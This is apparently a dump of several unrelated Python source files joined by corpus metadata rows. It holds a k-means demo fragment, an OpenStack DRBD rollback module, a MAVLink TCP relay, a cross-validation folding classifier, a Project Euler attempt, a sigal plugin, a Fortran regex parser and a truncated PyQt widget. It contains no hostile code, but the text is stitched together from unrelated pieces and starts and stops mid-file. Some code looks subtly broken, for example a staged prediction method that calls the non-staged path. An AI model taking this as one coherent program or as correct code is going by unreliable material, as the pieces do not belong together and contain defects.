# Get lables
print "Create the lables, this should take some time...."
# The interesting part is what is going on in the classify method.
labels = kmeans.classify(trainingX, trainingY, centroids)
# Plot the labled data
print "Plot the labled data."
plotter.clear()
plotter.plotCentroids(centroids)
plotter.plotLabledData(trainingX, trainingY, labels, centroids)
raw_input('Press enter to continue')
# Recalculated the centroids and unlable the data so to say...
print "Plot the new centroids."
plotter.clear()
plotter.plotUnlabledData(trainingX, trainingY)
centroids = kmeans.reCalculateCentroids(trainingX, trainingY, labels, centroids)
plotter.plotCentroids(centroids)
raw_input('Press enter to continue')
raw_input("Trying out the clusters with some new data... press enter to continue")
# Here we just look as some different data.
rawDataX, rawDataY = loadData('largeDataSet.txt')
labels = kmeans.classify(rawDataX, rawDataY, centroids)
plotter.clear()
plotter.plotCentroids(centroids)
plotter.plotLabledData(rawDataX, rawDataY, labels, centroids)
raw_input('Finished. Press enter to close.')
| apache-2.0 | -5,114,689,128,812,637,000 | 34.568182 | 119 | 0.739936 | false | 3.394794 | false | false | false |
fs714/drcontroller | drcontroller/test/recovery_rollback.py | 1 | 7584 | import logging
import os
import hashlib
from functools import wraps
from taskflow import engines
import sys
sys.path.append('../recovery')
from base import AnsibleTask, ShellTask, LinearFlowCreator, UnorderedFlowCreator
sys.path.append("../db")
from db_Dao import DRGlanceDao, DRNovaDao
def task_list(fn):
@wraps(fn)
def wrapper(self, tasks, *args, **kwargs):
task = fn(self, *args, **kwargs)
task.add_result_handler(self.result_handler)
tasks.append(task)
return wrapper
class RollbackHandler(object):
def __init__(self):
self.logger = logging.getLogger("RecoveryHandler")
self.logger.info('Init RecoveryHandler')
result_handler = ResultHandler()
self.glance_handler = GlanceHandler(result_handler)
self.nova_handler = NovaHandler(result_handler)
def start(self, *req, **kwargs):
self.logger = logging.getLogger("RecoveryHandler:start")
self.logger.info("--- Hello Recovery ---")
flow = self.prepare()
eng = engines.load(flow)
eng.run()
results = eng.storage.fetch_all()
print results
return ['Hello Recovery']
def prepare(self):
flows = [self.glance_handler.prepare(), self.nova_handler.prepare()]
flow = UnorderedFlowCreator().create('restore', flows)
return LinearFlowCreator().create('DR_restore', [self.nova_handler.stop_vm_task[0], flow] + self.glance_handler.drbd_tasks)
class RecoveryError(Exception):
pass
class ResultHandler(object):
def __init__(self):
pass
def analyze(self, name, result):
for host in result['dark']:
print 'Error in Task "%s": %s' % (name, result['dark'][host]['msg'])
raise RecoveryError('Error in Task "%s": %s' % (name, result['dark'][host]['msg']))
for host in result['contacted']:
self.analyze_result_for_host(name, result['contacted'][host])
def analyze_result_for_host(self, name, result):
if 'msg' in result and result['msg'] != '':
print 'Error in Task "%s": %s' % (name, result['msg'])
if 'service-start' in name:
raise RecoveryError('Error in Task "%s": %s' % (name, result['msg']))
if 'stderr' in result and result['stderr'] != '':
print 'Error in Task "%s": %s' % (name, result['stderr'])
if 'role_change' in name and 'State change failed' in result['stderr']:
raise RecoveryError('Error in Task "%s": %s' % (name, result['stderr']))
if 'stdout' in result and result['stdout'] != '':
print 'Output in Task "%s": %s' % (name, result['stdout'])
class ComponentHandler(object):
def __init__(self, component, hosts, disc, result_handler):
self.component = component
self.hosts = hosts
self.disc = disc
self.config = None
self.disc_tasks = []
self.result_handler = result_handler
self.restore_tasks =[]
@task_list
def create_role_change_task(self):
drbd = 'openstack' #config
return ShellTask('%s_role_change' % drbd, self.hosts, 'drbdadm secondary %s' % drbd)
@task_list
def create_disconnect_task(self):
drbd = 'openstack' #config
return ShellTask('%s_disconnect' % drbd, self.hosts, 'drbdadm disconnect %s' % drbd)
@task_list
def create_network_up_task(self):
return ShellTask('network_neo4_up', self.hosts, 'ifconfig eno4 up')
@task_list
def create_connect_task(self):
drbd = 'openstack' #config
return ShellTask('%s_connect' % drbd, self.hosts, 'drbdadm -- --discard-my-data connect %s' % drbd)
def prepare(self):
self.create_tasks()
return self.create_flow()
def create_tasks(self):
raise NotImplementedError()
def create_flow(self):
raise NotImplementedError()
def analyze(self):
raise NotImplementedError()
class GlanceHandler(ComponentHandler):
def __init__(self, result_handler):
controllers = ['10.175.150.16'] #config
super(GlanceHandler, self).__init__('glance', controllers, 'drbd0', result_handler)
self.db = DRGlanceDao()
self.drbd_tasks = []
@task_list
def create_restore_backup_task(self):
return ShellTask('%s_fs_restore' % self.component, self.hosts, 'chdir=/var/lib mv %sbak %s' % (self.component, self.component))
@task_list
def create_remove_task(self):
return ShellTask('%s_fs_remove' % self.component, self.hosts, 'chdir=/var/lib rm -rf %s' % self.component)
@task_list
def create_umount_task(self):
return AnsibleTask('%s_fs_umount' % self.component, self.hosts, 'mount', 'src=/dev/%s name=/var/lib/%s fstype=xfs state=unmounted' % (self.disc, self.component))
def create_tasks(self):
self.create_umount_task(self.disc_tasks)
self.create_remove_task(self.disc_tasks)
self.create_restore_backup_task(self.disc_tasks)
self.create_disconnect_task(self.drbd_tasks)
self.create_role_change_task(self.drbd_tasks)
self.create_network_up_task(self.drbd_tasks)
self.create_connect_task(self.drbd_tasks)
def create_flow(self):
return LinearFlowCreator().create('glance_op', self.disc_tasks + self.restore_tasks)
class NovaHandler(ComponentHandler):
def __init__(self, result_handler):
nodes = ['10.175.150.16'] #config
super(NovaHandler, self).__init__('nova', nodes, 'drbd1', result_handler)
self.db = DRNovaDao()
self.instance_tasks = {}
self.base_tasks = {}
self.stop_vm_task = []
self.instance_ids = []
@task_list
def create_restore_backup_task(self):
return ShellTask('%s_fs_restore' % self.component, self.hosts, 'chdir=/var/lib/%s mv instancesbak instances' % self.component)
@task_list
def create_remove_task(self):
return ShellTask('%s_fs_remove' % self.component, self.hosts, 'chdir=/var/lib/%s rm -rf instances' % self.component)
@task_list
def create_rebase_task(self, host, instance_uuid_local, base_uuid_local):
return ShellTask('rebase', host, 'chdir=/var/lib/nova/instances/%s qemu-img -u -b /var/lib/nova/instances/_base/%s disk' % (instance_uuid_local, base_uuid_local))
@task_list
def create_umount_task(self):
return AnsibleTask('%s_fs_umount' % self.component, self.hosts, 'mount', 'src=/dev/%s name=/var/lib/%s/instances fstype=xfs state=unmounted' % (self.disc, self.component))
@task_list
def create_vm_stop_task(self):
controllers = ['10.175.150.16'] #config
return ShellTask('vm_stop', [controllers[0]], 'python /home/eshufan/scripts/nova_stop_vm.py --instance_ids %s' % ','.join(self.instance_ids))
def create_tasks(self):
for (instance_uuid_primary, instance_uuid_local, image_uuid_primary, image_uuid_local, host_primary, host_local) in self.db.get_all_uuids_node():#[('', 'f6158ecb-18ca-4295-b3dd-3d7e0f7394d2', '10.175.150.16')]:
print (instance_uuid_primary, instance_uuid_local, image_uuid_local)
self.instance_ids.append(instance_uuid_local)
self.create_vm_stop_task(self.stop_vm_task)
self.create_umount_task(self.disc_tasks)
self.create_remove_task(self.disc_tasks)
self.create_restore_backup_task(self.disc_tasks)
def create_flow(self):
return LinearFlowCreator().create('nova_op', self.disc_tasks + self.restore_tasks)
if __name__ == '__main__':
rollback = RollbackHandler()
rollback.start()
| apache-2.0 | 2,197,469,561,397,222,100 | 38.915789 | 218 | 0.635153 | false | 3.470938 | true | false | false |
djnugent/mavlink | pymavlink/examples/mavtcpsniff.py | 43 | 2992 | #!/usr/bin/env python
'''
connect as a client to two tcpip ports on localhost with mavlink packets. pass them both directions, and show packets in human-readable format on-screen.
this is useful if
* you have two SITL instances you want to connect to each other and see the comms.
* you have any tcpip based mavlink happening, and want something better than tcpdump
hint:
* you can use netcat/nc to do interesting redorection things with each end if you want to.
Copyright Sept 2012 David "Buzz" Bussenschutt
Released under GNU GPL version 3 or later
'''
import sys, time, os, struct
from pymavlink import mavutil
#from pymavlink import mavlinkv10 as mavlink
from argparse import ArgumentParser
parser = ArgumentParser(description=__doc__)
parser.add_argument("srcport", type=int)
parser.add_argument("dstport", type=int)
args = parser.parse_args()
msrc = mavutil.mavlink_connection('tcp:localhost:{}'.format(args.srcport), planner_format=False,
notimestamps=True,
robust_parsing=True)
mdst = mavutil.mavlink_connection('tcp:localhost:{}'.format(args.dstport), planner_format=False,
notimestamps=True,
robust_parsing=True)
# simple basic byte pass through, no logging or viewing of packets, or analysis etc
#while True:
# # L -> R
# m = msrc.recv();
# mdst.write(m);
# # R -> L
# m2 = mdst.recv();
# msrc.write(m2);
# similar to the above, but with human-readable display of packets on stdout.
# in this use case we abuse the self.logfile_raw() function to allow
# us to use the recv_match function ( whch is then calling recv_msg ) , to still get the raw data stream
# which we pass off to the other mavlink connection without any interference.
# because internally it will call logfile_raw.write() for us.
# here we hook raw output of one to the raw input of the other, and vice versa:
msrc.logfile_raw = mdst
mdst.logfile_raw = msrc
while True:
# L -> R
l = msrc.recv_match();
if l is not None:
l_last_timestamp = 0
if l.get_type() != 'BAD_DATA':
l_timestamp = getattr(l, '_timestamp', None)
if not l_timestamp:
l_timestamp = l_last_timestamp
l_last_timestamp = l_timestamp
print("--> %s.%02u: %s\n" % (
time.strftime("%Y-%m-%d %H:%M:%S",
time.localtime(l._timestamp)),
int(l._timestamp*100.0)%100, l))
# R -> L
r = mdst.recv_match();
if r is not None:
r_last_timestamp = 0
if r.get_type() != 'BAD_DATA':
r_timestamp = getattr(r, '_timestamp', None)
if not r_timestamp:
r_timestamp = r_last_timestamp
r_last_timestamp = r_timestamp
print("<-- %s.%02u: %s\n" % (
time.strftime("%Y-%m-%d %H:%M:%S",
time.localtime(r._timestamp)),
int(r._timestamp*100.0)%100, r))
| lgpl-3.0 | 1,323,866,075,814,192,600 | 32.244444 | 156 | 0.621324 | false | 3.56615 | false | false | false |
vkuznet/rep | rep/metaml/folding.py | 1 | 15416 | """
This is specific meta-algorithm based on the idea of cross-validation.
"""
from __future__ import division, print_function, absolute_import
import numpy
from sklearn import clone
from six.moves import zip
from . import utils
from sklearn.cross_validation import KFold
from sklearn.utils.validation import check_random_state
from .factory import train_estimator
from ..estimators.interface import Classifier, Regressor
from ..estimators.utils import check_inputs
import pandas
__author__ = 'Tatiana Likhomanenko, Alex Rogozhnikov'
__all__ = ['FoldingClassifier', 'FoldingRegressor']
from .utils import get_classifier_probabilities, get_classifier_staged_proba, get_regressor_prediction, \
get_regressor_staged_predict
class FoldingBase(object):
"""
Base class for FoldingClassifier and FoldingRegressor
"""
def __init__(self,
base_estimator,
n_folds=2,
random_state=None,
features=None,
parallel_profile=None):
self.estimators = []
self.parallel_profile = parallel_profile
self.n_folds = n_folds
self.base_estimator = base_estimator
self._folds_indices = None
self.random_state = random_state
self._random_number = None
# setting features directly
self.features = features
def _get_folds_column(self, length):
"""
Return special column with indices of folds for all events.
"""
if self._random_number is None:
self._random_number = check_random_state(self.random_state).randint(0, 100000)
folds_column = numpy.zeros(length)
for fold_number, (_, folds_indices) in enumerate(
KFold(length, self.n_folds, shuffle=True, random_state=self._random_number)):
folds_column[folds_indices] = fold_number
return folds_column
def _prepare_data(self, X, y, sample_weight):
raise NotImplementedError('To be implemented in descendant')
def fit(self, X, y, sample_weight=None):
"""
Train the classifier, will train several base classifiers on overlapping
subsets of training dataset.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param y: labels of events - array-like of shape [n_samples]
:param sample_weight: weight of events,
array-like of shape [n_samples] or None if all weights are equal
"""
if hasattr(self.base_estimator, 'features'):
assert self.base_estimator.features is None, \
'Base estimator must have None features! Use features parameter in Folding instead'
self.train_length = len(X)
X, y, sample_weight = self._prepare_data(X, y, sample_weight)
folds_column = self._get_folds_column(len(X))
for _ in range(self.n_folds):
self.estimators.append(clone(self.base_estimator))
if sample_weight is None:
weights_iterator = [None] * self.n_folds
else:
weights_iterator = (sample_weight[folds_column != index] for index in range(self.n_folds))
result = utils.map_on_cluster(self.parallel_profile, train_estimator,
range(len(self.estimators)),
self.estimators,
(X.iloc[folds_column != index, :].copy() for index in range(self.n_folds)),
(y[folds_column != index] for index in range(self.n_folds)),
weights_iterator)
for status, data in result:
if status == 'success':
name, classifier, spent_time = data
self.estimators[name] = classifier
else:
print('Problem while training on the node, report:\n', data)
return self
def _folding_prediction(self, X, prediction_function, vote_function=None):
"""
Supplementary function to predict (labels, probabilities, values)
:param X: dataset to predict
:param prediction_function: function(classifier, X) -> prediction
:param vote_function: if using averaging over predictions of folds, this function shall be passed.
For instance: lambda x: numpy.mean(x, axis=0), which means averaging result over all folds.
Another useful option is lambda x: numpy.median(x, axis=0)
"""
X = self._get_features(X)
if vote_function is not None:
print('KFold prediction with voting function')
results = []
for estimator in self.estimators:
results.append(prediction_function(estimator, X))
# results: [n_classifiers, n_samples, n_dimensions], reduction over 0th axis
results = numpy.array(results)
return vote_function(results)
else:
if len(X) != self.train_length:
print('KFold prediction using random classifier (length of data passed not equal to length of train)')
else:
print('KFold prediction using folds column')
folds_column = self._get_folds_column(len(X))
parts = []
for fold in range(self.n_folds):
parts.append(prediction_function(self.estimators[fold], X.iloc[folds_column == fold, :]))
result_shape = [len(X)] + list(numpy.shape(parts[0])[1:])
results = numpy.zeros(shape=result_shape)
folds_indices = [numpy.where(folds_column == fold)[0] for fold in range(self.n_folds)]
for fold, part in enumerate(parts):
results[folds_indices[fold]] = part
return results
def _staged_folding_prediction(self, X, prediction_function, vote_function=None):
X = self._get_features(X)
if vote_function is not None:
print('Using voting KFold prediction')
iterators = [prediction_function(estimator, X) for estimator in self.estimators]
for fold_prob in zip(*iterators):
result = numpy.array(fold_prob)
yield vote_function(result)
else:
if len(X) != self.train_length:
print('KFold prediction using random classifier (length of data passed not equal to length of train)')
else:
print('KFold prediction using folds column')
folds_column = self._get_folds_column(len(X))
iterators = [prediction_function(self.estimators[fold], X.iloc[folds_column == fold, :])
for fold in range(self.n_folds)]
folds_indices = [numpy.where(folds_column == fold)[0] for fold in range(self.n_folds)]
for stage_results in zip(*iterators):
result_shape = [len(X)] + list(numpy.shape(stage_results[0])[1:])
result = numpy.zeros(result_shape)
for fold in range(self.n_folds):
result[folds_indices[fold]] = stage_results[fold]
yield result
def _get_feature_importances(self):
"""
Get features importance
:return: pandas.DataFrame with column effect and `index=features`
"""
importances = numpy.sum([est.feature_importances_ for est in self.estimators], axis=0)
# to get train_features, not features
one_importances = self.estimators[0].get_feature_importances()
return pandas.DataFrame({'effect': importances / numpy.max(importances)}, index=one_importances.index)
class FoldingRegressor(FoldingBase, Regressor):
"""
This meta-regressor implements folding algorithm:
* training data is splitted into n equal parts;
* we train n regressors, each one is trained using n-1 folds
To build unbiased predictions for data, pass the **same** dataset (with same order of events)
as in training to `predict` or `staged_predict`, in which case
classifier will use to predict each event that base classifier which didn't use that event during training.
To use information from not one, but several estimators during predictions,
provide appropriate voting function. Examples of voting function:
>>> voting = lambda x: numpy.mean(x, axis=0)
>>> voting = lambda x: numpy.median(x, axis=0)
Parameters:
-----------
:param sklearn.BaseEstimator base_estimator: base classifier, which will be used for training
:param int n_folds: count of folds
:param features: features used in training
:type features: None or list[str]
:param parallel_profile: profile for IPython cluster, None to compute locally.
:type parallel_profile: None or str
:param random_state: random state for reproducibility
:type random_state: None or int or RandomState
"""
def _prepare_data(self, X, y, sample_weight):
X = self._get_features(X)
y_shape = numpy.shape(y)
self.n_outputs_ = 1 if len(y_shape) < 2 else y_shape[1]
return check_inputs(X, y, sample_weight=sample_weight, allow_multiple_targets=True)
def predict(self, X, vote_function=None):
"""
Get predictions. To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used. Parameters: numpy.ndarray [n_classifiers, n_samples]
:type vote_function: None or function
:rtype: numpy.array of shape [n_samples, n_outputs]
"""
return self._folding_prediction(X, prediction_function=get_regressor_prediction,
vote_function=vote_function)
def staged_predict(self, X, vote_function=None):
"""
Get predictions after each iteration of base estimator.
To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used. Parameters: numpy.ndarray [n_classifiers, n_samples]
:type vote_function: None or function
:rtype: sequence of numpy.array of shape [n_samples, n_outputs]
"""
return self._folding_prediction(X, prediction_function=get_regressor_staged_predict,
vote_function=vote_function)
def get_feature_importances(self):
"""
Get features importance
:rtype: pandas.DataFrame with column effect and `index=features`
"""
return self._get_feature_importances()
@property
def feature_importances_(self):
"""Sklearn-way of returning feature importance.
This returned as numpy.array, assuming that initially passed train_features=None """
return self.get_feature_importances().ix[self.features, 'effect'].values
class FoldingClassifier(FoldingBase, Classifier):
"""
This meta-classifier implements folding algorithm:
* training data is splitted into n equal parts;
* we train n classifiers, each one is trained using n-1 folds
To build unbiased predictions for data, pass the **same** dataset (with same order of events)
as in training to `predict`, `predict_proba` or `staged_predict_proba`, in which case
classifier will use to predict each event that base classifier which didn't use that event during training.
To use information from not one, but several estimators during predictions,
provide appropriate voting function. Examples of voting function:
>>> voting = lambda x: numpy.mean(x, axis=0)
>>> voting = lambda x: numpy.median(x, axis=0)
Parameters:
-----------
:param sklearn.BaseEstimator base_estimator: base classifier, which will be used for training
:param int n_folds: count of folds
:param features: features used in training
:type features: None or list[str]
:param parallel_profile: profile for IPython cluster, None to compute locally.
:type parallel_profile: None or str
:param random_state: random state for reproducibility
:type random_state: None or int or RandomState
"""
def _prepare_data(self, X, y, sample_weight):
X = self._get_features(X)
self._set_classes(y)
return check_inputs(X, y, sample_weight=sample_weight, allow_multiple_targets=True)
def predict(self, X, vote_function=None):
"""
Predict labels. To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used.
:type vote_function: None or function
:rtype: numpy.array of shape [n_samples]
"""
return numpy.argmax(self.predict_proba(X, vote_function=vote_function), axis=1)
def predict_proba(self, X, vote_function=None):
"""
Predict probabilities. To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used.
:type vote_function: None or function
:rtype: numpy.array of shape [n_samples, n_classes]
"""
result = self._folding_prediction(X, prediction_function=get_classifier_probabilities,
vote_function=vote_function)
return result / numpy.sum(result, axis=1, keepdims=True)
def staged_predict_proba(self, X, vote_function=None):
"""
Predict probabilities after each stage of base_estimator.
To get unbiased predictions on training dataset, pass training data
(with same order of events) and vote_function=None.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param vote_function: function to combine prediction of folds' estimators.
If None then folding scheme is used.
:type vote_function: None or function
:rtype: sequence of numpy.arrays of shape [n_samples, n_classes]
"""
for proba in self._staged_folding_prediction(X, prediction_function=get_classifier_staged_proba,
vote_function=vote_function):
yield proba / numpy.sum(proba, axis=1, keepdims=True)
def get_feature_importances(self):
"""
Get features importance
:rtype: pandas.DataFrame with column effect and `index=features`
"""
return self._get_feature_importances()
@property
def feature_importances_(self):
"""Sklearn-way of returning feature importance.
This returned as numpy.array, assuming that initially passed train_features=None """
return self.get_feature_importances().ix[self.features, 'effect'].values
| apache-2.0 | 2,105,406,814,477,879,600 | 43.944606 | 118 | 0.638622 | false | 4.250345 | false | false | false |
gotclout/PythonJunk | 6.py | 1 | 1220 | #!/usr/bin/env python
from math import *
MAX_TRI = 9999999L
triangles = []
def next_pos(mn, pos):
if mn > triangles[MAX_TRI - 1]:
return -1
else:
maxv = MAX_TRI - 1
minv = pos
mid = minv + (maxv - minv) / 2
while triangles[mid] != mn and minv < maxv:
if triangles[mid] < mn :
minv = mid + 1
else :
maxv = mid - 1
mid = minv + (maxv - minv) / 2
return mid
def gen_triangles(offset):
triangles[:] = []
i = 1L + offset * MAX_TRI
bound = i + MAX_TRI
print "Generating %i through %i " % (i, bound)
while i <= bound:
triangles.append((i * (i + 1L)) / 2L)
i += 1L
print "Max value = %i " % (triangles[MAX_TRI - 1])
def pe321():
offset = pos = tn = total = count = mn = 0L
n = 1L
while count != 40L:
mn = 2L * n + n * n
while mn % 3L != 0L and mn % 9L != 1L:
n += 1L
mn = 2L * n + n * n
tn = 1L + 8L * mn
if sqrt(tn) % 1 == 0:
count += 1L
total += n
print "%i.\tM(%i) = %i is a triangule number" % (count, n, mn)
# if n == 1L:
n += 1L
# else:
# n += tn / (2 * (n * n))
#else:
# n += 1L
print "The sum of the first %i terms = %i" % (count, total)
pe321()
| mit | -49,138,977,504,631,160 | 21.181818 | 68 | 0.488525 | false | 2.62931 | false | false | false |
kontza/sigal | sigal/plugins/album_title_mangler.py | 1 | 2734 | # -*- coding: utf-8 -*-
# Copyright (c) 2015 - Juha Ruotsalainen
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""Plugin which replaces certain characters in album names.
Rules for conversion are specified in sigal.conf.py -file in
an array of tuples by the name of 'album_title_mangler'. E.g.
album_title_mangler = [('__','-'),('_',' ')]
This example will first convert all double underscores into a single dash,
then convert all single underscores into a single space. You can add
as many tuples as you want, just remember: the order is important,
mangling rules are processed in first-come-first-serve -order.
Btw, the given example above is the default name mangling rule.
"""
import collections
import logging
import os.path
from sigal import signals
logger = logging.getLogger(__name__)
orderedDict = collections.OrderedDict([('__', '-'), ('_', ' ')])
def process_album(album):
'''Process an album title with the predefined rules set in orderedDict.'''
toMangle = album.title
for key in orderedDict.keys():
value = orderedDict[key]
toMangle = toMangle.replace(key, value)
album.title = toMangle
logger.info("Album name mangled to '%s'." % toMangle)
def register(settings):
global orderedDict
pluginName = os.path.splitext(__name__)[-1][1:]
try:
dictInput = settings[pluginName]
od = collections.OrderedDict(dictInput)
orderedDict = od
logger.info(
"Using the following name mangling rules: %s", orderedDict)
except:
# Settings didn't contain input. Use the default.
logger.info("Using the default name mangling rules: %s", orderedDict)
signals.album_initialized.connect(process_album)
| mit | 5,192,421,733,631,370,000 | 37.507042 | 78 | 0.724579 | false | 4.12368 | false | false | false |
ratnania/fortlint | fortlint/extractors.py | 1 | 6817 | # -*- coding: utf8 -*-
import re
import os
# ...
list_keywords_decs = ["integer", "real", "logical", "type", "class"]
dict_keywords_re = {}
for word in list_keywords_decs:
# pattern = r"[ ]*\b" + word + r"\b\s*::\s*"
pattern = r"[ ]*" + word + r"[^:]*::\s*(.+)"
word_re = re.compile(pattern, re.DOTALL | re.I)
dict_keywords_re[word] = word_re
# ...
# ...
def extract_blocks(word, TAG):
pattern_start = word + "\s+" + TAG
pattern_end = "end\s+" + word + r"\s+\b" + TAG + r"\b"
pattern = pattern_start + "(.*?)" + pattern_end
word_re = re.compile(pattern, re.DOTALL | re.I)
return word_re
# ...
# ...
def extract_signature():
pattern = r"[^:]*\(.+\)"
# pattern ="\(.+\)"
# pattern =r"\s*\(\s*.*\)"
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def extract_arguments():
pattern ="([\w]*),*"
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def get_names_subroutine(text_in):
# ... find subroutine names
keyword = "subroutine"
pattern = r"\b" + keyword + r"\b.*\("
word_re = re.compile(pattern, re.I)
text = word_re.findall(text_in.lower(), re.I)
list_names = []
for t in text:
list_s = [s for s in t.split(keyword) if len(s) > 0]
for s in list_s:
list_d = [d.rstrip().lstrip() for d in s.split("(") if len(d) > 0]
list_names.append(list_d[0])
# print ("+++++ subroutine-names :", list_names)
list_names = [name.lower() for name in list_names if len(name) > 0]
return list_names
# ...
# ...
def get_names_function(text_in):
# ... find function names
keyword = "function"
pattern = r"\b" + keyword + r"\b.*\("
word_re = re.compile(pattern, re.I)
text = word_re.findall(text_in.lower(), re.I)
list_names = []
for t in text:
list_s = [s for s in t.split(keyword) if len(s) > 0]
for s in list_s:
list_d = [d.rstrip().lstrip() for d in s.split("(") if len(d) > 0]
list_names.append(list_d[0])
# print ("+++++ function-names :", list_names)
list_names = [name.lower() for name in list_names if len(name) > 0]
return list_names
# ...
# ...
def get_names_module(text_in):
# ... find module names
keyword = "module"
pattern = r"\b" + keyword + r"\b.*"
word_re = re.compile(pattern, re.I)
text = word_re.findall(text_in.lower(), re.I)
list_names = []
for t in text:
list_s = [s for s in t.split(keyword) if len(s) > 0]
# print ("++ list_s :", list_s)
for s in list_s:
list_d = [d.rstrip().lstrip() for d in s.split("(") if len(d) > 0]
list_names.append(list_d[0])
set_names = set(list_names)
list_names = list(set_names)
list_names = [name.lower() for name in list_names if len(name) > 0]
# print ("+++++ modules-names :", list_names)
return list_names
# ...
# ...
def get_calls_subroutine(source):
_re = extract_subroutine_call()
return _re.findall(source, re.I)
# ...
# ...
def get_calls_function(source):
_re = extract_function_call()
return _re.findall(source, re.I)
# ...
# ...
def extract_subroutine_call():
pattern = r"\bcall\s+(\w+)\("
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def extract_function_call():
pattern = r"\b(\w+)\("
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def extract_contains():
pattern = r"\bcontains\b"
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def get_declarations_calls(source):
text = source
_re = extract_contains()
condition = (len(_re.findall(text, re.I)) > 0)
dict_decl = {}
dict_calls = {}
if condition:
list_code = _re.split(text)
# ... get calls - subroutines
calls_sub = get_calls_subroutine(list_code[0])
# ...
# ... get calls - functions
_calls_fun = get_calls_function(list_code[0])
calls_fun = [s for s in _calls_fun if s not in calls_sub]
# ...
# ... put back the other contains
list_code_new = []
code = list_code[1]
list_code_new.append(r"\tcontains \n")
list_code_new.append(code)
text = ''.join(list_code_new[:])
# ...
# ... get declaration - subroutines
names_sub = get_names_subroutine(text)
# ...
# ... get declaration - functions
names_fun = get_names_function(text)
# ...
# ...
dict_decl["subroutine"] = names_sub
dict_decl["function"] = names_fun
# ...
# ...
dict_calls["subroutine"] = calls_sub
dict_calls["function"] = calls_fun
# ...
else:
# ... get calls - subroutines
calls_sub = get_calls_subroutine(text)
# ...
# ... get calls - functions
_calls_fun = get_calls_function(text)
calls_fun = [s for s in _calls_fun if s not in calls_sub]
# ...
# ...
dict_decl["subroutine"] = []
dict_decl["function"] = []
# ...
# ...
dict_calls["subroutine"] = calls_sub
dict_calls["function"] = calls_fun
# ...
return dict_decl, dict_calls
# ...
# ...
def get_signature_from_text(source):
_re = extract_signature()
m = _re.match(source)
t = m.group(0)
return t
# ...
# ...
def get_arguments_from_text(source):
text = source
try:
data = extract_arguments().findall(text.lstrip(), re.I)
arguments = [b.rstrip().lstrip() for b in data if len(b) > 0]
except:
arguments = []
return arguments
# ...
# ...
def get_declarations_variables(source, constructor):
_source = source.lower()
list_var = []
for word in list_keywords_decs:
pattern = r"[ ]*" + word + r"[^:]*::\s*(.+)"
pattern = r"[ ]*" + word + r"(.*dimension)?.*::\s*(.+)"
_re = re.compile(pattern,re.I)
_vars_name = _re.findall(_source, re.I)
print _vars_name
try:
_vars_arg,_vars_name = zip(*_vars_name)
except:
_vars_name = [] ; _vars_arg = None
print _vars_name, " ---- ",_vars_arg
# _vars_name = _re.match(_source).group(-1)
if len(_vars_name) > 0:
for _vars, _args in zip(_vars_name, _vars_arg):
for var_name in _vars.split(','):
args = _args.split(',')
args = [s.strip() for s in args if len(s)>0]
print var_name, " --- ARGS :", args
var = constructor(name=var_name.strip(), \
dtype=word, \
attributs=args)
list_var.append(var)
return list_var
# ...
| mit | -7,290,100,828,926,428,000 | 25.525292 | 78 | 0.511809 | false | 3.169224 | false | false | false |
linyc74/WinduVision | gui/gui_tuner_window.py | 1 | 12150 | import cv2, time, sys, threading, os, json
from PyQt4 import QtCore, QtGui, QtOpenGL
from constants import *
class SliderWidget(QtGui.QWidget):
'''
This widget wraps a single parameter in the TunerWindow.
Name, value, min, max, interval are stored in this object.
Three gui elements are included to display the information of the parameter:
1) QLabel showing name
2) QLabel showing value
3) QSlider
'''
def __init__(self, parent, name, min, max, value, interval):
super(SliderWidget, self).__init__(parent)
self.parent = parent
self.name = name
self.min = min
self.max = max
self.value = value
self.interval = interval
self.QLabel_name = QtGui.QLabel(self) # QLabel showing name
self.QLabel_value = QtGui.QLabel(self) # QLabel showing value
self.QSlider = QtGui.QSlider(QtCore.Qt.Horizontal, self) # QSlider
# Create and set H box layout
self.hbox = QtGui.QHBoxLayout()
self.setLayout(self.hbox)
self.hbox.addWidget(self.QLabel_name)
self.hbox.addWidget(self.QLabel_value)
self.hbox.addWidget(self.QSlider)
self.QLabel_name.setText(name)
self.QLabel_value.setText(str(value))
self.QSlider.setMinimum(min)
self.QSlider.setMaximum(max)
self.QSlider.setValue(value)
self.QSlider.setSingleStep(interval)
self.QSlider.setTickInterval(interval)
self.QSlider.setTickPosition(QtGui.QSlider.TicksBelow)
self.QSlider.sliderReleased.connect(self.slider_released)
def slider_released(self):
'''
User invoked action (mouse release event) => Notify the parent object
'''
value = self.QSlider.value()
# Round the value to fit the interval
value = value - self.min
value = round( value / float(self.interval) ) * self.interval
value = int( value + self.min )
self.value = value
self.QSlider.setValue(value)
